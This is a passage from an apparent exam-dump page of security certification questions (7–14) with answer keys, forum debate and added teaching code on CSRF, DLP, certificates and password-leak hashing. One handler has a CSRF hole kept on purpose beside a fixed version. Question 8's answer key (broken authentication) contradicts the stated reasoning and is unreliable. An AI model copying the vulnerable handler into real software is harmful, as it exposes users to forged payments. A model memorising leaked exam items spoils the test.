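SAMPLE_RECORD = {
    "name": "Alice Smith",
    "phone": "+1 (415) 555-0123",
    "ssn": "123-45-6789",
    "email": "alice.smith@example.com",
    "order_total": 250,
}

if __name__ == "__main__":
    for field, value in mask_record(SAMPLE_RECORD).items():
        print(f"{field:12} {value}")
```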

Question #7 Topic 1

A company is implementing a DLP solution on the file server. The file server has PII, financial information, and health information stored on it.
Depending on what type of data that is hosted on the file server, the company wants different DLP rules assigned to the data. Which of the
following should the company do to help accomplish this goal?

A. Classify the data.

B. Mask the data.

C. Assign the application owner.

D. Perform a risk analysis.

Correct Answer: A

Community vote distribution


A (100%)

  Ribeiro19 Highly Voted  5 months, 1 week ago


Selected Answer: A
Classify the data. This permits DLP to distinguish the types of data, with the intent of applying different rules depending on the classification.
upvoted 9 times

  stoneface Highly Voted  5 months, 1 week ago


Data classification and typing schemas tag data assets so that they can be managed through the information life cycle. A data classification
schema is a decision tree for applying one or more tags or labels to each data asset. Many data classification schemas are based on the degree
of confidentiality required:

Public (unclassified)—there are no restrictions on viewing the data. Public information presents no risk to an organization if it is disclosed but
does present a risk if it is modified or not available.
Confidential (secret)—the information is highly sensitive, for viewing only by approved persons within the owner organization, and possibly by
trusted third parties under NDA.
Critical (top secret)—the information is too valuable to allow any risk of its capture. Viewing is severely restricted.
upvoted 8 times

  thisguyfucks Most Recent  19 hours, 11 minutes ago


It's going to be A. Data classification is the process an organization follows to develop an understanding of its information assets, assign a value to those assets, and determine the effort and cost required to properly secure the most critical of those information assets.
upvoted 1 times

  sauna28 1 month, 3 weeks ago


Selected Answer: A
Classifying data is no. 1 before you proceed to the next step.
upvoted 1 times

  tek7ila 2 months, 1 week ago


Selected Answer: A
Yep, fully agree with A. The other options make no sense
upvoted 1 times


Question #8 Topic 1

A forensics investigator is examining a number of unauthorized payments that were reported on the company's website. Some unusual log entries
show users received an email for an unwanted mailing list and clicked on a link to attempt to unsubscribe. One of the users reported the email to
the phishing team, and the forwarded email revealed the link to be:
<a href="https://www.company.com/payto.do?routing=00001111&acct=22223334&amount=250">Click here to unsubscribe</a>
Which of the following will the forensics investigator MOST likely determine has occurred?

A. SQL injection

B. Broken authentication

C. XSS

D. XSRF

Correct Answer: B

Community vote distribution


D (95%) 5%

  dylansmith064 Highly Voted  8 months, 4 weeks ago


CSRF or XSRF redirects you to something you didn't intend to go to when clicking a link
upvoted 32 times

  fboy 8 months, 2 weeks ago


thank you!
upvoted 2 times

  comeragh Highly Voted  5 months ago


Selected Answer: D
Going with D also. Funds out of a bank account in most cases indicates CSRF.
upvoted 6 times

  BeOr Most Recent  5 days, 23 hours ago


Hello guys,
Has anyone here passed the exam using this website? It has very, very bad reviews, as shown here. Please let me know. They say the questions are outdated.
https://www.trustpilot.com/review/www.examtopics.com
upvoted 1 times

  DALLASCOWBOYS 6 days, 21 hours ago


Definitely D. XSRF. The malicious link hides its true intention. The link suggested it would unsubscribe, but its true intent was to transfer money out of the account.
upvoted 1 times

  Proctored_Expert 1 month, 2 weeks ago


Selected Answer: C
The forensics investigator will most likely determine that XSS (cross-site scripting) has occurred.

XSS is a type of cyber attack that involves injecting malicious code into a website or web application, with the goal of executing the code in the
context of the victim's browser. XSS attacks can be used to steal sensitive information, such as login credentials or personal data, or to
manipulate the behavior of the website or application.

The log entry provided in the question describes a link that was included in an email, which was clicked on by a user in an attempt to
unsubscribe from an unwanted mailing list. Upon investigation, the forwarded email revealed that the link contained malicious code, specifically
an XSS attack. This indicates that an XSS attack was carried out against the company's website.
upvoted 1 times

  hieptran 1 month ago


Wrong. CSRF utilizes the current user session and uses it to invoke the request on behalf of the victim.
In this example, there is no malicious JavaScript payload that would indicate a Reflected XSS vulnerability in their website.
XSS is often used for session/cookie hijacking, but not in this case.
upvoted 3 times

  nul8212 1 month, 2 weeks ago


Selected Answer: D
• Cross-Site Request Forgery (CSRF): This is known as CSRF or XSRF. The user must be authenticated to the webserver where the user clicks on a link, like, or share button to act. CSRF could be used to make purchases, make a bank transfer, or change a password.
upvoted 2 times

  Jossie_C 3 months ago
Xsrf is cross-site request forgery...speaks for itself
upvoted 2 times

  DoDaResearch 3 months, 1 week ago


Selected Answer: D
An attacker crafts code to create an HTTP request that, if it were run in the browser of a logged in user, would do something dangerous such as
transfer money or delete data. The attacker then finds a way—typically through email—to get the malicious code into a victim’s browser.
Depending on your definition of "Broken Authentication" that could work, I just don't see this as the authentication as broken as the attacker
never logged in.
Ref: https://www.stackhawk.com/blog/what-is-cross-site-request-forgery-csrf/
upvoted 4 times

  be9z 3 months, 3 weeks ago


The answer is CSRF or XSRF. This attack can result in damaged client relationships, unauthorized fund transfers, changed passwords and data
theft—including stolen session cookies.
CSRFs are typically conducted using malicious social engineering, such as an email or link that tricks the victim into sending a forged request to
a server.
upvoted 1 times

  Mondicles 4 months, 2 weeks ago


Selected Answer: D
XSRF or CSRF can make unauthorized requests on behalf of a victim by clicking links in emails or elements in a suspicious website.
upvoted 1 times

  abrilo 4 months, 3 weeks ago


Broken authentication attacks aim to take over one or more accounts giving the attacker the same privileges as the attacked user. Authentication
is “broken” when attackers are able to compromise passwords, keys or session tokens, user account information, and other details to assume
user identities.
upvoted 1 times

  Joe1984 5 months ago


Answer is D
upvoted 1 times

  stoneface 5 months, 1 week ago


Selected Answer: D
XSRF - see dylansmith064 answer
upvoted 3 times

  dnc1981 5 months, 1 week ago


Selected Answer: D
The link looks like it's transferring money out of an account.
upvoted 4 times
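The forged request in this question beside a hardened version of the same endpoint, as an added example written for this page rather than code from any real site; the session store, server secret and request objects are constructed for the demo, and the URL is the one from the question:

```python
"""Vulnerable vs. hardened handler for the payto.do endpoint (added example)."""
import hashlib
import hmac
from dataclasses import dataclass, field
from urllib.parse import parse_qs, urlsplit

SITE_ORIGIN = "https://www.company.com"         # the site named in the question
SERVER_SECRET = b"constructed-demo-secret"       # placeholder; use a random key in practice
SESSIONS = {"sess-alice": "alice"}               # constructed session store: cookie -> user

# The link from the phishing email in the question.
FORGED_URL = "https://www.company.com/payto.do?routing=00001111&acct=22223334&amount=250"


@dataclass
class Request:
    """Minimal stand-in for an HTTP request as a web framework would hand it over."""
    method: str
    url: str
    cookies: dict = field(default_factory=dict)
    headers: dict = field(default_factory=dict)
    form: dict = field(default_factory=dict)


def _params(req: Request) -> dict:
    """Merge query-string and form parameters into one flat dict (form wins)."""
    merged = {k: v[0] for k, v in parse_qs(urlsplit(req.url).query).items()}
    merged.update(req.form)
    return merged


def vulnerable_payto(req: Request) -> tuple[int, str]:
    """The pattern the question describes: any request carrying a valid session
    cookie is honoured, so a GET triggered by clicking a link moves money."""
    user = SESSIONS.get(req.cookies.get("session"))
    if user is None:
        return 401, "login required"
    p = _params(req)
    return 200, f"{user} paid {p['amount']} to {p['routing']}/{p['acct']}"


def csrf_token(session_id: str) -> str:
    """Synchronizer token: an HMAC bound to the session. A third-party page never
    sees the cookie value, so it cannot compute or guess this token."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def hardened_payto(req: Request) -> tuple[int, str]:
    """Same endpoint with the checks that defeat cross-site request forgery.
    (Marking the session cookie SameSite=Lax/Strict is a further layer.)"""
    sid = req.cookies.get("session")
    user = SESSIONS.get(sid)
    if user is None:
        return 401, "login required"
    # 1. State-changing actions never ride on GET, so a plain link cannot trigger them.
    if req.method != "POST":
        return 405, "state change requires POST"
    # 2. The browser-set Origin (or Referer) header must name our own site.
    src = req.headers.get("Origin") or req.headers.get("Referer") or ""
    parts = urlsplit(src)
    if f"{parts.scheme}://{parts.netloc}" != SITE_ORIGIN:
        return 403, "cross-origin request rejected"
    # 3. The form must carry the per-session token that only our own pages embed.
    token = req.form.get("csrf_token", "")
    if not hmac.compare_digest(token, csrf_token(sid)):
        return 403, "missing or invalid CSRF token"
    p = _params(req)
    return 200, f"{user} paid {p['amount']} to {p['routing']}/{p['acct']}"


def forged_click() -> Request:
    """What the victim's logged-in browser sends after clicking the email link."""
    return Request("GET", FORGED_URL, cookies={"session": "sess-alice"},
                   headers={"Referer": "https://mail.example.net/inbox"})


def legitimate_submit() -> Request:
    """What the site's own transfer form sends."""
    return Request("POST", "https://www.company.com/payto.do",
                   cookies={"session": "sess-alice"},
                   headers={"Origin": SITE_ORIGIN},
                   form={"routing": "00001111", "acct": "22223334", "amount": "250",
                         "csrf_token": csrf_token("sess-alice")})


if __name__ == "__main__":
    print("vulnerable, forged click :", vulnerable_payto(forged_click()))
    print("hardened,   forged click :", hardened_payto(forged_click()))
    print("hardened,   own form     :", hardened_payto(legitimate_submit()))
```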


Question #9 Topic 1

A report delivered to the Chief Information Security Officer (CISO) shows that some user credentials could be exfiltrated. The report also indicates
that users tend to choose the same credentials on different systems and applications. Which of the following policies should the CISO use to
prevent someone from using the exfiltrated credentials?

A. MFA

B. Lockout

C. Time-based logins

D. Password history

Correct Answer: A

Community vote distribution


A (58%) D (42%)

  Ribeiro19 Highly Voted  5 months, 1 week ago


Selected Answer: A
It is the only one that obligates you to have more info than a password to log in to the system.
upvoted 14 times

  Papee 3 months, 2 weeks ago


Prevent users from using the exfiltrated account. MFA would better security, not prevent it.
upvoted 1 times

  DALLASCOWBOYS Most Recent  6 days, 21 hours ago


A. MFA can limit the credentials being acquired
upvoted 1 times

  zf1343 1 week ago


Selected Answer: A
MFA: Correct. Because the hacker needs to provide additional authentication factor information besides the already leaked credential.
Lockout: Prevents against multiple incorrect attempts such as brute force attacks. Doesn't prevent login from leaked credentials.
Time-based logins: Normally associated with TOTP or complements as second factor authentication through email or SMS or voice.
Password history: Works in conjunction with account expiration policy to increase security. Neither will prevent a valid credential login that has
been leaked.
upvoted 1 times

  yaw255 3 weeks, 3 days ago


The answer is A MFA, not D because the same credentials BUT on different systems
upvoted 2 times

  Drealjesusfreak 4 weeks ago


It says that users tend to choose the same credentials on different systems and applications. If you use the same credentials with MFA, I will still be able to log in, but if I have password history it will not allow you to use the same credentials to log in. It's a tricky one, but I think it's D.
upvoted 1 times

  Waniey 1 month, 1 week ago


I think lockout, B, since the exfiltrated credential is not used again.
upvoted 1 times

  Sezz 1 month, 1 week ago


The answer is in the document NIST 800-63B. The answer is MFA. Also, just think about it: when you have a password history and it is set to the last 5 passwords, after 5 password periods, maybe 30x5 or 45x5 days, criminals can use the breached credentials again. And also criminals know that some users will inevitably cycle through older passwords, including those that have been exposed in previous breaches. In 800-63, if an authenticator is stolen, I mean theft, the only way to prevent this is MFA.
upvoted 2 times

  Rockrl 1 month, 1 week ago


Selected Answer: A
MFA is 100% the answer. The question states "prevent someone", meaning an attacker, from using the exfiltrated password.
With MFA the client will need both the password and another authentication factor to gain access.
upvoted 1 times

  Blachy 1 month, 1 week ago
I think it's B, why not lockout?

Account lockout policies lock out an account after a specific number of failed login attempts. This type of response helps to prevent brute force
attacks by stopping them from using repeated attempts until they can successfully log in.
upvoted 2 times

  NayaP 1 month, 2 weeks ago


Guys, why not Lockout? Can anyone explain.

"The account lockout policy “locks” the user's account after a defined number of failed password attempts. The account lockout prevents the
user from logging onto the network for a period of time even if the correct password is entered"
upvoted 3 times

  shi_ 1 week, 1 day ago


I think it is because of the words 'exfiltrated credentials'. If you use lockout then it will lock the account; it can be the answer, but I think at work the procedure cannot be implemented that easily.
For me, I vote A.
upvoted 1 times

  Proctored_Expert 1 month, 2 weeks ago


Selected Answer: A
The CISO should use MFA (multi-factor authentication) to prevent someone from using the exfiltrated credentials.

MFA is a security measure that requires multiple forms of authentication to access a system or data. MFA typically involves the use of two or
more of the following factors: something the user knows (e.g. a password or PIN), something the user has (e.g. a security token or smart card), or
something the user is (e.g. a biometric characteristic). By requiring multiple forms of authentication, MFA helps to prevent unauthorized access to
a system or data, even if a user's credentials are exfiltrated.

The report delivered to the CISO indicates that some user credentials could be exfiltrated, and that users tend to choose the same credentials on
different systems and applications. This means that if an attacker were to obtain a user's credentials, they could potentially use them to gain
access to multiple systems or applications. MFA would help to prevent this by requiring additional forms of authentication, making it more
difficult for an attacker to gain access to a system or data.
upvoted 1 times

  viksap 1 month, 2 weeks ago


Selected Answer: D
It’s D
upvoted 1 times

  Heyjoem 1 month, 2 weeks ago


For sure A
upvoted 1 times

  yoyo1207 1 month, 3 weeks ago


CISO use to prevent someone from using the exfiltrated credentials?
MFA won't stop the already exfiltrated passwords from being used. They might not get in, but they can still be used. I'm going with D.
upvoted 1 times

  nerdboy1992 1 month, 3 weeks ago


The answer would depend on who 'someone' is. If someone is the user, then password history can be the answer. But the user can always use
the same credentials on all systems, they would just be different from their previous set which would defeat the purpose.

With MFA, if someone, being a "malicious user", were to use the credentials, MFA would prevent their access.
upvoted 1 times

  its_melly 1 month, 3 weeks ago


Selected Answer: D
Key words "prevent using exfiltrated credentials" MFA doesn't prevent from using credentials.
Password history requires you to use a different password. Answer is D
upvoted 1 times

  its_melly 1 month, 3 weeks ago


MFA doesn't prevent you from using the same* credentials
upvoted 1 times


Question #10 Topic 1

A company wants to simplify the certificate management process. The company has a single domain with several dozen subdomains, all of which
are publicly accessible on the internet. Which of the following BEST describes the type of certificate the company should implement?

A. Subject alternative name

B. Wildcard

C. Self-signed

D. Domain validation

Correct Answer: B

Community vote distribution


B (90%) 8%

  Ay_ma Highly Voted  5 months ago


Selected Answer: B
B- Wildcard SSL(Secure Sockets Layer) Certificate: Wildcard SSL certificates are for a single domain and all its subdomains.

www.cloudfare.com
upvoted 11 times

  comeragh Highly Voted  5 months ago


Selected Answer: B
Agree with B wildcard being the correct answer here
upvoted 8 times

  DALLASCOWBOYS Most Recent  6 days, 21 hours ago


B. Wildcard. Helps with a main domain, with multiple subdomains on websites.
upvoted 1 times

  ShivP2 1 week ago


A. Subject alternative name (SAN) certificate would be the best option for a company with a single domain and several dozen subdomains that
are publicly accessible on the internet. SAN certificates allow a single certificate to be associated with multiple domain names, allowing the
company to secure all of its subdomains with a single certificate, simplifying the certificate management process.

A wildcard certificate would also be a valid option for a company with a single domain and several dozen subdomains that are publicly accessible
on the internet. It allows a single certificate to be associated with all subdomains of a domain, making it easy to secure all the subdomains under
one certificate. However, a Wildcard certificate would only work for subdomains and would not cover the main domain or any other domain that
is not a subdomain of the main domain, in this case if the company wants to add any other domain in the future it would require another
certificate.
upvoted 1 times

  xxxdolorxxx 2 weeks ago


Selected Answer: B
My vote goes to B.
upvoted 1 times

  Proctored_Expert 1 month, 2 weeks ago


Selected Answer: B
The company should implement a wildcard certificate.

A wildcard certificate is a type of digital certificate that can be used to secure multiple subdomains within a single domain. Wildcard certificates
use the wildcard character (*) in the certificate's subject alternative name (SAN) field to match any subdomain within a given domain. This allows
a single wildcard certificate to be used to secure all subdomains within the domain, simplifying the certificate management process.

The company in this case has a single domain with several dozen subdomains, all of which are publicly accessible on the internet. Implementing
a wildcard certificate would allow the company to secure all of its subdomains with a single certificate, simplifying the certificate management
process.
upvoted 1 times

  viksap 1 month, 2 weeks ago


Selected Answer: B
Wildcard is correct
upvoted 1 times


  tek7ila 2 months, 1 week ago


Selected Answer: B
With subdomains it's always wildcard.
upvoted 2 times

  Fulmi 2 months, 1 week ago


Selected Answer: D
D - Because it's a public DNS name and should be signed by a CA. Backend or internal could use a wildcard, but not for the internet. The biggest concern with wildcard certificates is that when one server or sub-domain covered by the wildcard is compromised, all sub-domains may be compromised.
upvoted 1 times

  johnajwer 2 months, 2 weeks ago


Selected Answer: A
The SAN field also allows a certificate to represent different subdomains, such as www.comptia.org and members.comptia.org.

Wildcard is an easy method but not secure.


upvoted 1 times

  Nirmalabhi 2 months, 3 weeks ago


Selected Answer: B
ALSO AGREED WITH B
upvoted 2 times

  rodwave 2 months, 3 weeks ago


Selected Answer: B
Answer: Wildcard - A wildcard certificate is an SSL certificate that allows an unlimited number of subdomains under a single domain to be encrypted by the same certificate.
==========================
Other Choices
Subject Alternative Name - Lets you specify additional host names (sites, IP addresses, common names, etc.) to be protected by a single SSL
Certificate.

Self-Signed - Self-signed certificates are public key certificates that users issue and sign themselves instead of obtaining them from a publicly trusted Certificate Authority. These are useful for authenticating users on an internal network.

Domain Validation - SSL certificates that require only one validation setup between the person/organization applying for the certificate and a publicly trusted Certificate Authority, who will confirm whether they own the domain. Common methods for verification can be by email, file verification, or DNS verification.
upvoted 3 times

  moon971 2 months, 3 weeks ago


agree with B
upvoted 1 times

  Joe1984 5 months ago


Selected Answer: B
Wildcard
upvoted 1 times

  Boogie_79 5 months ago


Selected Answer: A
A wildcard certificate is a public key certificate used by all subdomains within a larger domain. Using a wildcard certificate on a publicly facing
web server, you can quickly secure unlimited subdomains that are all encrypted by the same certificate.
upvoted 2 times

  Ribeiro19 5 months, 1 week ago


Selected Answer: B
It is wildcard -> *.company.com. This lets you have many URLs that share the same big domain.
upvoted 4 times
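How a *.company.com wildcard entry and a SAN list are actually matched against a hostname, as an added example not taken from the thread; it implements the strict whole-label wildcard rules that current TLS stacks apply (one label only, never the bare domain, no partial wildcards), and the SAN lists are constructed for the demo:

```python
"""Wildcard and SAN hostname matching in the RFC 6125 style (added example)."""


def _labels(name: str) -> list[str]:
    """Normalise a DNS name: lowercase, drop a trailing dot, split into labels."""
    return name.lower().rstrip(".").split(".")


def hostname_matches(pattern: str, hostname: str) -> bool:
    """Return True if a certificate dNSName `pattern` covers `hostname`.

    Rules applied (the strict subset modern TLS stacks use):
      * no wildcard: exact, case-insensitive match;
      * '*' is accepted only as the entire leftmost label;
      * it matches exactly one label, so '*.company.com' covers
        www.company.com but not company.com (too few labels) or
        a.b.company.com (too many);
      * at least two literal labels must follow it, so '*.com' is refused.
    """
    p, h = _labels(pattern), _labels(hostname)
    if "*" not in pattern:
        return p == h
    if p[0] != "*" or any("*" in label for label in p[1:]):
        return False  # partial (w*.company.com) or non-leading wildcards
    if len(p) < 3:
        return False  # refuse '*.com' and a bare '*'
    if len(h) != len(p):
        return False  # the wildcard spans exactly one label
    return h[0] != "" and p[1:] == h[1:]


def cert_covers(san_dns_names: list[str], hostname: str) -> bool:
    """True if any dNSName entry in the certificate's SAN list matches."""
    return any(hostname_matches(name, hostname) for name in san_dns_names)


def coverage_report(san_dns_names: list[str], hostnames: list[str]) -> dict[str, bool]:
    """Map each hostname to whether the certificate would be accepted for it."""
    return {host: cert_covers(san_dns_names, host) for host in hostnames}


# Constructed SAN lists for the certificate types discussed in the thread.
WILDCARD_CERT = ["*.company.com"]                      # subdomains only
WILDCARD_PLUS_APEX = ["company.com", "*.company.com"]  # the usual way to also cover the apex
SAN_CERT = ["company.com", "www.company.com", "mail.company.com", "api.company.com"]

if __name__ == "__main__":
    hosts = ["company.com", "www.company.com", "shop.company.com", "api.dev.company.com"]
    for label, san in (("wildcard", WILDCARD_CERT), ("wildcard+apex", WILDCARD_PLUS_APEX),
                       ("SAN", SAN_CERT)):
        print(label, coverage_report(san, hosts))
```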


Question #11 Topic 1

Which of the following is an effective tool to stop or prevent the exfiltration of data from a network?

A. DLP

B. NIDS

C. TPM

D. FDE

Correct Answer: A

Community vote distribution


A (87%) 13%

  Dachosenone Highly Voted  5 months, 1 week ago


Selected Answer: A
Data loss prevention (DLP) makes sure that users do not send sensitive or critical information outside the corporate network.
upvoted 11 times

  Fitzd Highly Voted  4 months, 2 weeks ago


Just passed, what you see is what you get..... these discussions help a lot..... thanks guys, and this site is all the luck you need.
upvoted 9 times

  ELLEWOODS45 4 months, 1 week ago


DID YOU REVIEW THE OLD DUMPS OR JUST THIS ONE? I AM TRYING TO PASS 😥, I NEED HELP 😭
upvoted 2 times

  banditring 4 months, 1 week ago


There's an old dump? I must find it. I take the exam in 2 weeks and am freaking out!!
upvoted 2 times

  DALLASCOWBOYS Most Recent  6 days, 21 hours ago


A. DLP tracks data moving within the network, and can block the data when it is in danger of leaving the corporate network.
upvoted 1 times

  Zonas 1 week, 2 days ago


Correct Answer : A
upvoted 1 times

  Nirmalabhi 2 months, 3 weeks ago


Selected Answer: A
The answer's right in front of you. Option A.
upvoted 1 times

  Imok 3 months, 3 weeks ago


Selected Answer: A
Data Loss Prevention
upvoted 1 times

  be9z 3 months, 3 weeks ago


FDE performs full disk encryption but it can not stop or prevent data exfiltration. The answer is A - Data Loss Prevention (DLP)
upvoted 2 times

  VendorPTS 4 months ago


Selected Answer: A
Data Loss Prevention is the clear winner here.
upvoted 1 times

  groger999 4 months, 1 week ago


Correct Answer: DLP
upvoted 2 times

  Ribeiro19 5 months ago


Selected Answer: A
It prevents data from being extracted from a corporate network.
upvoted 4 times

  comeragh 5 months ago
Selected Answer: A
DLP correct here
upvoted 2 times

  stoneface 5 months, 1 week ago


Selected Answer: D
DLP - Data Loss Prevention
upvoted 3 times

  Joe1984 5 months ago


A. DLP
upvoted 3 times
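Question #7's classification-driven DLP rules and Question #11's blocking of outbound data, carried through as an added example that is not from the exam or this thread; the detectors, the internal DNS suffix, the rule table and the sample files are all constructed for the demo:

```python
"""Classification-driven DLP decisions for a file server's outbound transfers."""
import re

# Detectors for the three data types in Question #7. Patterns are deliberately
# simple and constructed for this example; a product uses validated detectors.
SSN_RE = re.compile(r"\b\d{3}-\d{2}-\d{4}\b")
CARD_RE = re.compile(r"\b(?:\d[ -]?){13,16}\b")
HEALTH_RE = re.compile(r"\b(?:patient|diagnosis|prescription|ICD-10)\b", re.IGNORECASE)

# Assumed internal DNS suffix; transfers that stay inside the network are not
# subject to the egress rules.
INTERNAL_SUFFIX = ".corp.example"

# Classification label -> DLP action. Health and financial records are blocked
# outright; PII may leave only encrypted. The most restrictive action wins.
RULES = {"HEALTH": "block", "FINANCIAL": "block", "PII": "encrypt"}
SEVERITY = ["allow", "encrypt", "block"]


def luhn_ok(candidate: str) -> bool:
    """Luhn checksum, so arbitrary 13-16 digit strings are not flagged as cards."""
    digits = [int(c) for c in candidate if c.isdigit()]
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:
            d = d * 2 - 9 if d * 2 > 9 else d * 2
        total += d
    return total % 10 == 0


def classify(text: str) -> set[str]:
    """Tag the content with every classification label whose detector fires."""
    labels = set()
    if SSN_RE.search(text):
        labels.add("PII")
    if any(luhn_ok(m.group()) for m in CARD_RE.finditer(text)):
        labels.add("FINANCIAL")
    if HEALTH_RE.search(text):
        labels.add("HEALTH")
    return labels


def dlp_decision(text: str, destination: str) -> tuple[str, set[str]]:
    """Return (action, labels) for sending `text` to `destination` (a hostname)."""
    labels = classify(text)
    if destination.endswith(INTERNAL_SUFFIX):
        return "allow", labels
    actions = [RULES[label] for label in labels] or ["allow"]
    return max(actions, key=SEVERITY.index), labels


# Constructed sample files as the file server in the question might hold them.
SAMPLE_FILES = {
    "hr/employee.txt": "Employee SSN 123-45-6789 on file",
    "finance/refund.txt": "Refund to card 4111 1111 1111 1111 exp 12/26",
    "clinic/visit.txt": "Patient diagnosis: type 2 diabetes",
    "team/notes.txt": "Sprint planning notes, nothing sensitive",
}


def audit_egress(destination: str) -> dict[str, str]:
    """Decide the DLP action for every sample file sent to `destination`."""
    return {path: dlp_decision(text, destination)[0] for path, text in SAMPLE_FILES.items()}


if __name__ == "__main__":
    for dest in ("partner.example.net", "fileshare.corp.example"):
        print(dest, audit_egress(dest))
```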


Question #12 Topic 1

Several attempts have been made to pick the door lock of a secure facility. As a result, the security engineer has been assigned to implement a
stronger preventative access control. Which of the following would BEST complete the engineer's assignment?

A. Replacing the traditional key with an RFID key

B. Installing and monitoring a camera facing the door

C. Setting motion-sensing lights to illuminate the door on activity

D. Surrounding the property with fencing and gates

Correct Answer: A

Community vote distribution


A (93%) 7%

  Ribeiro19 Highly Voted  5 months ago


Selected Answer: A
B, C and D are not access controls. So, A is the only one XD
upvoted 5 times

  be9z 3 months, 3 weeks ago


A and D are access controls; however, A is the correct answer because it focuses on securing the door and not the other security perimeter of a facility. Hence RFID protects against both external threats (who is not supposed to have access to the building) and internal threats (staff who are not authorised to enter the room).
upvoted 4 times

  Halaa 4 months, 4 weeks ago


they are access control
upvoted 2 times

  stoneface 5 months ago


YES, 'access control'
upvoted 2 times

  DALLASCOWBOYS Most Recent  6 days, 20 hours ago


A. Replace with an RFID key. For B, a camera will act as a deterrent but won't prevent someone from attempting to pick the lock. For D, fencing and security gates can generally still be got around; they won't prevent them from picking the lock.
upvoted 1 times

  Bobbober12 1 week, 4 days ago


All but A are monitoring solutions.
upvoted 1 times

  Sandon 1 week, 1 day ago


Not true
upvoted 1 times

  rodwave 2 months, 3 weeks ago


Selected Answer: A
Replacing the traditional key with an RFID key - For this question, there is mention of "attempts have been made to pick the door lock". Out of
the options provided, only the option to replace the current door key with an RFID key directly addresses this issue. The other options can be
viewed as preventative access control systems/ deterrents as well.
============================
Helpful Info

Preventative access control - An access control that is used to stop unwanted or unauthorized activity from occurring, these could be policies,
firewalls, physical barriers etc.

RFID (Radio Frequency Identification) - A type of key card/fob access control system that uses radio frequency signals to communicate between a reader and an RFID tag. You would place the tag/card near the reader and, if the reader identifies the signal as belonging to an authorized user, they will be allowed access.
upvoted 3 times

  Tomtom11 2 months, 4 weeks ago


Selected Answer: B
Is the answer not B?
A preventative control is one that prevents specific actions from occurring, such as a mantrap prevents tailgating. Preventative controls act before an event, preventing it from advancing. A firewall is an example of a preventative control, as it can block access to a specific resource.
upvoted 1 times

  Orean 3 months, 1 week ago
Selected Answer: A
The operative word is PREVENTIVE. B and C are deterrent and/or detective in nature, whereas A and D are the only preventives. D could also be
effective in this context, though I'm leaning towards A because it directly addresses the door-lock concern in question.
upvoted 2 times

  Halaa 4 months, 4 weeks ago


RFID key is more secure.
upvoted 3 times

  comeragh 5 months ago


Selected Answer: A
Agree with A. B,C and D are all physical controls.
upvoted 4 times


Question #13 Topic 1

Which of the following can be used by a monitoring tool to compare values and detect password leaks without providing the actual credentials?

A. Hashing

B. Tokenization

C. Masking

D. Encryption

Correct Answer: A

Community vote distribution


A (100%)

  Ribeiro19 Highly Voted  5 months ago


Selected Answer: A
Hashing is the answer. Why? Because with hashing the tool can identify a credential without knowing the exact credential, by a mathematical method (ex: multiply the credential by a number, and all different credentials have different results). Comparing the hash of the local credential with the hash of the web credentials, the tool can extrapolate whether the credential was compromised.
upvoted 18 times

  DALLASCOWBOYS Most Recent  6 days, 20 hours ago


A. Hashing
upvoted 1 times

  Deeppain90 1 week, 6 days ago


Selected Answer: A
Hashing
upvoted 1 times

  xxxdolorxxx 2 weeks, 3 days ago


Selected Answer: A
A makes the most sense to me.
upvoted 1 times

  FMMIR 2 months, 2 weeks ago


Selected Answer: A
Because with hashing the tool can identify a credential without knowing the exact credential, by a mathematical method (ex: multiply the credential by a number, and all different credentials have different results). Comparing the hash of the local credential with the hash of the web credentials, the tool can extrapolate whether the credential was compromised.
upvoted 2 times

  okay123 2 months, 3 weeks ago


"Hashing is used to assure the authenticity of websites with which they may share personal and private information, in password storage
applications (personal or used by entities they interact with online), and is likely used by the antivirus solution they trust to keep their devices free
of malware." So if Hashing is used to validate the integrity of data, you can compare hashes to figure out if the data (password or whatever it is)
was compromised

https://www.uscybersecurity.net/csmag/what-the-hash-data-integrity-and-authenticity-in-american-jurisprudence/
upvoted 1 times

  Sultan1990 5 months ago


I think C.
upvoted 1 times

  Sultan1990 5 months ago


sorry A is answer
upvoted 6 times
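The mechanism the comments above are circling is worth seeing end to end. The block below is an added example, not code from the ExamTopics page or from any vendor: it implements the k-anonymity "range query" scheme used by Have I Been Pwned's Pwned Passwords API. The client hashes the password locally, sends only the first five hex characters of the SHA-1, and compares the returned suffixes on its own side, so the monitoring service never receives the credential or even its full hash. The leaked-password corpus is constructed for the demo and contains no real breach data.

```python
"""Leak check by hash comparison, without the monitoring tool receiving
the credential.

Added example (not from the page). Range-query scheme as used by the
Pwned Passwords API; the breach corpus below is constructed.
"""
import hashlib
import hmac

# Constructed stand-in for a leaked-password corpus (not real breach data).
LEAKED_PASSWORDS = ["password", "123456", "qwerty", "letmein", "Summer2023!"]


def sha1_hex(password: str) -> str:
    """SHA-1 is used because that is how the published corpus is keyed;
    it is an identifier here, not a protection mechanism."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


def build_corpus_index(passwords):
    """Bucket leaked hashes by their 5-hex-char prefix, as the service does."""
    index = {}
    for pw in passwords:
        digest = sha1_hex(pw)
        index.setdefault(digest[:5], []).append(digest[5:])
    return index


CORPUS_INDEX = build_corpus_index(LEAKED_PASSWORDS)


def range_query(prefix: str) -> list:
    """Server side: receives 5 hex chars, returns every suffix in that bucket.
    It never learns the password, nor which suffix the client cares about."""
    if len(prefix) != 5:
        raise ValueError("range query takes exactly 5 hex characters")
    return CORPUS_INDEX.get(prefix.upper(), [])


def is_leaked(password: str) -> bool:
    """Client side: hash locally, send the prefix, compare suffixes locally."""
    digest = sha1_hex(password)
    prefix, suffix = digest[:5], digest[5:]
    return any(hmac.compare_digest(suffix, s) for s in range_query(prefix))
```

With a 5-character prefix each bucket holds hundreds of real suffixes, which is what gives the scheme its anonymity: the server sees one of 16^5 buckets, not one password.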

Question #14 Topic 1

A security engineer is building a file transfer solution to send files to a business partner. The users would like to drop off the files in a specific
directory and have the server send the file to the business partner. The connection to the business partner is over the internet and needs to be
secure. Which of the following can be used?

A. S/MIME

B. LDAPS

C. SSH

D. SRTP

Correct Answer: C

Community vote distribution


C (84%) Other

  kiosk99 Highly Voted  5 months ago


Selected Answer: C
A File Transfer Protocol (FTP) server is typically configured with several public directories, hosting files, and user accounts.
SSH FTP (SFTP)

LDAP Secure (LDAPS)—the server is installed with a digital certificate, which it uses to set up a secure tunnel for the user credential exchange.

File transfer. Answer: SSH


upvoted 8 times

  rodwave Highly Voted  2 months, 3 weeks ago


Selected Answer: C
Answer: SSH - SSH or (Secure Shell) is a protocol that enables two computers to communicate securely by encrypting the connection. Since the
question is looking to transfer files over the internet to a specific directory, the FTP protocol can be used for the file transfer itself. As SSH can be
